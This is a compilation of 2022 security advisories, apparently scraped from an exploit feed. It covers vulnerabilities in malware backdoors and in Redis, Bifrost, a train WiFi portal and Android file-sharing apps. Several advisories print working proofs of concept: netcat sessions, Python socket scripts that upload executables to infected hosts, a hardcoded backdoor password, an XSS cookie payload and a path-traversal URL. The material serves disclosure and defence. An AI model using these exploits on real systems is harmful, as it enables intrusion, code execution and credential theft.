Backdoor.Win32.Psychward.10 malware suffers from an unauthenticated remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/70c5f8d61f6ac67091c0c5860e456427.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Psychward.10Vulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 13013.  Third-party adversarys who can reach infected systems can issue various commands made available by the backdoor.Family: PsychwardType: PE32MD5: 70c5f8d61f6ac67091c0c5860e456427Vuln ID: MVID-2022-0651Dropped files: winvxd.exeDisclosure: 10/22/2022Exploit/PoC:C:\>nc64.exe x.x.x.x 13013psychward final, ready for actionexec "c:\Windows\system32\calc.exe"file executedDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Psychward.10 MVID-2022-0651 Remote Command Execution

Email-Worm.Win32.Kipis.c malware suffers from a remote file write vulnerability that allows for remote code execution.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/8d0df60c96e4011c312d61ed3e6dc70e.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Email-Worm.Win32.Kipis.cVulnerability: Remote File Write Code ExecutionDescription: The malware listens on TCP port 8297. Third-party adversaries who can reach the infected host can write executable code to a file named "winlogins.exe" in SysWOW64 directory. The program will execute as soon as the binary transfer has completed. Successfully tested with a 880 byte executable.Family: KipisType: PE32MD5: 8d0df60c96e4011c312d61ed3e6dc70eVuln ID: MVID-2022-0652Dropped files: jpdrop.jpgDisclosure: 10/23/2022Exploit/PoC:from socket import *import timeMALWARE_HOST="x.x.x.x"PORT=8297DOOM="DOOM_SM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()        time.sleep(0.5)    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Email-Worm.Win32.Kipis.c MVID-2022-0652 File Write / Code Execution

Backdoor.Win32.Delf.arh malware suffers from an authentication bypass vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/b3b19524967d22d6eb7517b03b660b00.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Delf.arhVulnerability: Authentication BypassDescription: The malware runs an FTP server.  Third-party adversarys who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands.Family: DelfType: PE32MD5: b3b19524967d22d6eb7517b03b660b00Vuln ID: MVID-2022-0650Disclosure: 10/22/2022Exploit/PoC:C:\>nc64.exe 192.168.18.125 21220 ICS FTP Server ready.USER malvuln331 Password required for malvuln.PASS malvuln230 User malvuln logged in.SYST215 UNIX Type: L8 Internet Component SuiteCDUP \250 CWD command successful. "C:/" is current directory.PASV227 Entering Passive Mode (192,168,18,125,246,88).STOR DOOM_SM.exe150 Opening data connection for DOOM_SM.exe.226 File received okfrom socket import *MALWARE_HOST="192.168.18.125"PORT=63064DOOM="DOOM_SM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Delf.arh MVID-2022-0650 Authentication Bypass

A vulnerability, which was classified as problematic, was found in Redis. Affected is the function sigsegvHandler of the file debug.c of the component Crash Report. The manipulation leads to denial of service. The name of the patch is 0bf90d944313919eb8e63d3588bf63a367f020a3. It is recommended to apply a patch to fix this issue. VDB-211962 is the identifier assigned to this vulnerability.

Permalink

Browse files

Avoid crash on crash report when a bad function pointer was called (#…

…11298)

If Redis crashes due to calling an invalid function pointer,
the \`backtrace\` function will try to dereference this invalid pointer
which will cause a crash inside the crash report and will kill
the processes without having all the crash report information.

Example:

\`\`\`
=== REDIS BUG REPORT START: Cut & paste starting from here ===
198672:M 19 Sep 2022 18:06:12.936 # Redis 255.255.255 crashed by signal: 11, si\_code: 1
198672:M 19 Sep 2022 18:06:12.936 # Accessing address: 0x1
198672:M 19 Sep 2022 18:06:12.936 # Crashed running the instruction at: 0x1
// here the processes is crashing
\`\`\`

This PR tries to fix this crash be:
1. Identify the issue when it happened.
2. Replace the invalid pointer with a pointer to some dummy function
   so that \`backtrace\` will not crash.

I identification is done by comparing \`eip\` to \`info->si\_addr\`, if they
are the same we know that the crash happened on the same address it tries to
accesses and we can conclude that it tries to call and invalid function pointer.

To replace the invalid pointer we introduce a new function, \`setMcontextEip\`,
which is very similar to \`getMcontextEip\` and it knows to set the Eip for the
different supported OS's. After printing the trace we retrieve the old \`Eip\` value.

*   Loading branch information

CVE-2022-3647: Avoid crash on crash report when a bad function pointer was called (#… · redis/redis@0bf90d9

Bifrost is a heterogeneous middleware that synchronizes MySQL, MariaDB to Redis, MongoDB, ClickHouse, MySQL and other services for production environments. Versions prior to 1.8.8-release are subject to authentication bypass in the admin and monitor user groups by deleting the X-Requested-With: XMLHttpRequest field in the request header. This issue has been patched in 1.8.8-release. There are no known workarounds. 

**Package**

gomod https://github.com/brokercap/Bifrost/tree/master/admin/controller (Go)

**Affected versions**

<=v1.8.6-release

**Patched versions**

v1.8.7-release

**Description**

**Impact**

The admin and monitor user groups need to be authenticated by username and password.  
If we delete the X-Requested-With: XMLHttpRequest field in the request header,the authentication will be bypassed.

**Patches**

https://github.com/brockercap/Bifrost/pull/201

**Workarounds**

Upgrade to the latest version

CVE-2022-39267: Authentication check flaw leads to authentication bypass

RRX IOB LP version 1.0 suffers from a DNS cache snooping vulnerability.

    Document Title:===============RRX IOB LP v1.0 - DNS Cache Snooping VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2261Article:https://www.vulnerability-db.com/?q=articles/2022/10/11/rhein-ruhr-express-rrx-dns-cache-snooping-vulnerability-wifi-hotspotRelease Date:=============2022-10-11Vulnerability Laboratory ID (VL-ID):====================================2261Common Vulnerability Scoring System:====================================5.3Vulnerability Class:====================MultipleCurrent Estimated Price:========================2.000€ - 3.000€Product & Service Introduction:===============================This product, solution or service ("Product") contains third-party software components listed in this document. These components are Open SourceSoftware licensed under a license approved by the Open Source Initiative (www.opensource.org) or similar licenses as determined by SIEMENS ("OSS")and/or commercial or freeware software components. With respect to the OSS components, the applicable OSS license conditions prevail over any otherterms and conditions covering the Product. The OSS portions of this Product are provided royalty-free and can be used at no charge.If SIEMENS has combined or linked certain components of the Product with/to OSS components licensed under the GNU LGPL version 2 or later as per thedefinition of the applicable license, and if use of the corresponding object file is not unrestricted ("LGPL Licensed Module", whereas the LGPLLicensed Module and the components that the LGPL Licensed Module is combined with or linked to is the "Combined Product"), the following additionalrights apply, if the relevant LGPL license criteria are met: (i) you are entitled to modify the Combined Product for your own use, including but notlimited to the right to modify the Combined Product to relink modified versions of the LGPL Licensed Module, and (ii) you may reverse-engineer theCombined Product, but only to debug your modifications. The modification right does not include the right to distribute such modifications and youshall maintain in confidence any information resulting from such reverse-engineering of a Combined Product.Certain OSS licenses require SIEMENS to make source code available, for example, the GNU General Public License, the GNU Lesser General Public Licenseand the Mozilla Public License. If such licenses are applicable and this Product is not shipped with the required source code, a copy of this sourcecode can be obtained by anyone in receipt of this information during the period required by the applicable OSS licenses by contacting the following address.Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a dns snooping vulnerability in the Rhein Ruhr Express (RRX IOB Landing Page 1.0 - Open Source Software) with Hotspot Siemens Portal.Vulnerability Disclosure Timeline:==================================2020-08-03: Researcher Notification & Coordination (Security Researcher)2020-08-04: Vendor Notification (Security Department)2020-08-27: Vendor Response/Feedback #1 (Security Department)2020-11-10: Vendor Response/Feedback #2 (Security Department)2021-01-30: Security Acknowledgements (Security Department)2022-10-09: Vendor Fix/Patch by Check (Service Developer Team)2022-10-11: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================No User InteractionDisclosure Type:================Responsible DisclosureTechnical Details & Description:================================A dns cache snooping vulnerability has been discovered in the official Rhein Ruhr Express (RRX IOB Landing Page 1.0 - Open Source Software) with Hotspot Siemens Portal.The vulnerability allows remote attackers to determine resolved sites and name servers to followup with manipulative interactions.The vulnerability allows remote attackers to determine which domains have recently been resolved via this name server, and therefore which hosts have been recently visited.For instance, if an attacker was interested in whether your company utilizes the online services of a particular financial institution, they would be able to use this attackto build a statistical model regarding company usage of that financial institution. Of course, the attack can also be usead to find B2B partners, web-surfing patterns, externalmail servers, and more. If this is an internal DNS server not accessible to outside networks, attacks would be limited to the internal network. This may include employees,consultants and potentially users on a guest network or WiFi connection if supported.Proof of Concept (PoC):=======================The dns cache snooping vulnerability can be exploited by remote attackers with wifi guest access without user interaction or privileged user account.For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.--- PoC Session Logs ---Sent a non-recursive query for test.comand received 1 answer: dnsmasq-2.7593.184.216.34Hosts53 / udp / dns   192.168.44.1Solution - Fix & Patch:=======================Improve the cache management via dns to ensure no manipulations can take place.Contact the manufacturer siemens to resolve the issue by an automated or manual patch.2022-10-09: Vendor Fix/Patch by Check (Service Developer Team)The patching process will be delivered by siemens during train maintenance and will take at least until 2022 Q2-Q3 to be rolled out on all trains (40+).Security Risk:==============The security risk of the web vulnerability in the siemens hotspot rxx wifi is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.comServices:   magazine.vulnerability-lab.com  paste.vulnerability-db.com       infosec.vulnerability-db.comSocial:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab       youtube.com/user/vulnerability0labFeeds:      vulnerability-lab.com/rss/rss.php   vulnerability-lab.com/rss/rss_upcoming.php   vulnerability-lab.com/rss/rss_news.phpPrograms:   vulnerability-lab.com/submit.php   vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.phpAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

RRX IOB LP 1.0 DNS Cache Snooping

WiFi File Transfer version 1.0.8 suffers from a cross site scripting vulnerability.

Document Title:  
===============  
WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2322

Release Date:  
=============  
2022-10-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2322

Common Vulnerability Scoring System:  
====================================  
5.6

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
WiFi File Transfer lets you transfer files to/from your phone or tablet via WiFi. Easy to use web interface, no USB cable required.

(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.smarterdroid.wififiletransfer&hl=de&gl=US  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a multiple persistent cross site vulnerabilities in the WiFi File Transfer v1.0.8 mobile android web-application.

Affected Product(s):  
====================  
smarterDroid  
Product: WiFi File Transfer v1.0.8 - Android (Wifi) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2022-10-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Independent Security Research

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the WiFi File Transfer v1.0.8 mobile web-application for android.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application  
requests from the application-side.

The vulnerabilities are located in the data_file parameter of the add a file or folder and create a zip file function.  
Attackers with wifi access are able to anonymous use the webui and can inject own malicious script code with persistent  
attack vector via post method request.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external  
redirects to malicious source and persistent manipulation of affected application modules.

Proof of Concept (PoC):  
=======================  
The persistent post inject web vulnerabilities can be exploited by remote attackers in the same wifi network with anonymous privileges and low user interaction.  
For security demonstration or to reproduce the web security vulnerability in the application follow the provided information and steps below to continue.

Manual reproduce of the vulnerability ...  
1. Install the mobile android application and start it  
2. Start the wifi web-server  
3. Login as attacker by the browser over the network  
4. Inject payload as folder name, file name or zip file and save via post method request  
5. The payload executes in the web ui when previewing the paths

Exploitation: Payload  
<a onmouseover=alert(document.cookie)>picture1337.jpg</a>

--- PoC Session Logs #1 (POST) [Add] [Create] [Folder] [data_file] ---  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------321836412920954805143620932676  
Content-Length: 613  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
action=mkdir&data_file=New"><a onmouseover=alert(document.cookie)>picture1337.jpg</a>&data_currentParams=?&data_filepath=/storage/emulated/0/DCIM/  
-  
POST: HTTP/1.1 302 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/DCIM/  
Content-Length: 143  
-  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
Connection: keep-alive  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

--- PoC Session Logs #2 (POST) [Add] [Create] [Zip] [data_file] ---  
http://localhost:1234/storage/emulated/0/Pictures/?  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------289297208414223233314228108045  
Content-Length: 882  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Upgrade-Insecure-Requests: 1  
action=multizip&data_file=.<a onmouseover=alert(document.cookie)>File.Zip</a>.Zip&data_currentParams=?&data_filepath=/storage/emulated/0/Pictures/&1.jpg=file&2.jpg=file  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/Pictures/  
Content-Length: 151  
-  
http://localhost:1234/storage/emulated/0/Pictures/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

Reference(s):  
http://localhost:1234/  
http://localhost:1234/storage/  
http://localhost:1234/storage/emulated/  
http://localhost:1234/storage/emulated/0/  
http://localhost:1234/storage/emulated/0/DCIM/  
http://localhost:1234/storage/emulated/0/Pictures/

Solution - Fix & Patch:  
=======================  
The persistent web vulnerabilities can be resolved by the following steps ...  
1. Restrict the input of the folder, filename and zip files to disallow special chars for add or create process  
2. Encode and escape the content of the data_file parameter to sanitize the content  
3. Sanitize and filter the output locations of the explorer path listings to prevent further attacks

Security Risk:  
==============  
The security risk of the persistent web vulnerabilities in the mobile android wifi web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

WiFi File Transfer 1.0.8 Cross Site Scripting

Backdoor.Win32.Redkod.d malware suffers from a hardcoded credential vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/bb309bdd071d5733efefe940a89fcbe8.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Redkod.d  
Vulnerability: Weak Hardcoded Credentials   
Description: The malware listens on TCP port 4820. Authentication is required, however the password "redkod" is weak and hardcoded in cleartext within the PE file.  
Family: Redkod  
Type: PE32  
MD5: bb309bdd071d5733efefe940a89fcbe8  
Vuln ID: MVID-2022-0649  
Disclosure: 10/16/2022

Exploit/PoC:  
C:\>nc64.exe x.x.x.x 4820  
===========================================================  
=                   RedKod Backdoor 1.0                   =  
=                        By R-e-D                         =  
=                  http://www.redkod.com                  =  
=                     r-e-d@redkod.com                    =  
===========================================================

Password: redkod

RBackdoor# exec calc  
msg: Execution effectuee avec succes

RBackdoor# setpass malvuln

RBackdoor# help  
COMMAND HELP:

 > Shell Commands :

CD          Permet de changer de repertoire courant  
CLEAR       Efface le buffer de la console  
COPY        Permet de copier un fichier  
DEL         Permet d'effacer un ou plusieurs fichier  
DIR         Permet de lister le contenu d'un repertoire  
FIND        Recherche un fichier a travers le path  
HELP        Affiche cette aide  
LS          Permet de lister le contenu d'un repertoire  
MD          Permet de creer un repertoire  
MOVE        Permet de deplacer un fichier ou un repertoire  
REN         Permet de renommer un fichier  
PWD         Permet de recuperer le repertoire courant  
RMDIR       Permet d'effacer un repertoire  
SHELL       Permet d'executer toute commande DOS sur le systeme cible

 > Informations Commands :

CLIP        Permet de recuperer le contenu du presse papier  
DISKINFO    Permet de recuperer des informations sur les disques durs  
GETGROUPS   Permet de recuperer des informations sur les groupes, les users, les            SID :)  
GETPROCESS  Recupere et affiche la liste des processus actifs  
GETSERVICES Permet d'afficher les services NT presents sur une machine local ou             distante  
LISTEVENT   Permet de lister les journaux du eventlog  
NETSHARE    Permer d'afficher les ressources partager de la machine local ou d'u            ne machine distante  
ENUMSERVER  Permet d'afficher les servers appartenant au domaine  
SYSINFO     Permet de recuperer des informations sur le systeme cible  
TIME        Affiche l'heure et la date du systeme distant  
UPTIME      Permet d'afficher depuis combien de temps le systeme fonctionne  
USERINFO    Permet d'obtenir des informations sur un utilisateur  
VERSION     Affiche la version de RBackdoor  
WHOAMI      Permet de recuperer l'utilisateur logge sur la machine

 > Interactions Commands :

ADDEVENT    Permet d'ajouter un evenement dans l'eventlog  
ADDSHARE    Permet d'ajouter une ressource partagee  
BEEP        Fait beeper le haut parleur interne  
CLEARLOG    Permet d'effacer un journal complet de l'eventlog  
DELSERVICE  Permet de supprimer un service present  
DELSHARE    Permet de retirer une ressource partagee  
EXEC        Permet d'executer une commande sur le systeme cible  
HEXEC       Permet d'executer une commande tout en cachant sa sortie  
LOGOFF      Permet de fermer la session de l'utilisateur courant  
KILLPROCESS Permet de killer un processus  
MOUSE       Permet de placer le curseur de la souris au coordonnees x et y                  voulues  
MSGBOX      Permet d'envoyer une boite de dialogue au systeme cible avec message            personalise  
RCHAT       Permet d'etablir une communication ecrite avec une personne etant pr            esent sur le pc distant  
REBOOT      Permet de redemarrer la machine  
SCREENSHOT  Permet de prendre un screenshot du bureau de la machine distante  
SENDKEY     Permet d'emuler la pression d'une touche du clavier  
SETNAME     Change le nom NetBios du serveur  
STARTSERVICE Permet de demarrer un servive present sur la machine serveur  
STOPSERVICE Permet de stopper un service present et demarrer

 > Administration of RBackdoor Commands :

EXIT        Permet de fermer la connection a la backdoor tout en laissant                   la backdoor active  
KILL        Permet de desactiver ou de reactiver la backdoor  
OPEN        Creer un nouveau processus de RBackdoor sur un autre port  
SETPASS     Permet de modifier le pass associe a la backdoor

 > RBackdoor Tools :

FGET        Permet de recuperer un fichier sur un serveur FTP  
FPUT        Permet d'uploader un fichier sur un serveur FTP  
MAIL        Permet d'envoyer un mail, etc...  
NETPATCH    Rootkit permettant de patcher netstat.exe pour cacher RBackdoor  
RCRYPT      Permet de crypter ou de decrypter un fichier  
RPATCH      Permet de patcher le systeme pour effacer rbackdoor  
RSHELL      Permet de lancer un vrai shell DOS  
SCAN        Permet de scanner les ports d'une hote distante  
TELNET      Permet de se connecter a une hote distante (TCP Protocol Only)  
VIEW        Permet de lire le contenu d'un fichier  
WGET        Recupere et d'affiche le contenu d'un fichier heberge sur un serveur            http  
WRITE       Permet d'ecrire directement dans un fichier

msg: Tapez help <command> pour des informations plus precises sur la commande voulue

RBackdoor# rshell  
                                 ATTENTION!!  
Pour fermer le shell veuillez tapez 'exit'! Sinon perte de la backdoor envisageable !

Microsoft Windows [Version 10.0.16299.309]  
(c) 2017 Microsoft Corporation. All rights reserved.

C:\dump>whoami  
whoami  
desktop-2c4jqho\victim

C:\dump>net user hyp3rlinx 666 /add  
net user hyp3rlinx 666 /add  
The command completed successfully.

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Redkod.d MVID-2022-0649 Hardcoded Credential

Webile version 1.0.1 suffers from a directory traversal vulnerability.

    Document Title:===============Webile v1.0.1 - Directory Traversal Web VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2320Release Date:=============2022-10-10Vulnerability Laboratory ID (VL-ID):====================================2320Common Vulnerability Scoring System:====================================7.3Vulnerability Class:====================Directory- or Path-TraversalCurrent Estimated Price:========================1.000€ - 2.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-02-06: Researcher Notification & Coordination (Security Researcher)2022-02-07: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2022-10-10: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============HighAuthentication Type:====================Open Authentication (Anonymous Privileges)User Interaction:=================No User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A directory traversal web vulnerability has been discovered  in the Webile v1.0.1 wifi mobile web application.The vulnerability allows remote attackers to change the application path in performed requests to compromise thelocal application or file-system of a mobile device. Attackers are for example able to request environmentvariables or a sensitive system path.The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is notsecure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files withoutsecure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.Proof of Concept (PoC):=======================The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/--- PoC Session Logs ---http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/Host: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Connection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked--- FS Session Logs ---Output:File name   bluetoothbpfcarriercompatconfiginitpermissionspppseccomp_policysecurityselinuxsensorssysconfigtextclassifierthemevintfepdgipmSecurity Risk:==============The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Directory Traversal

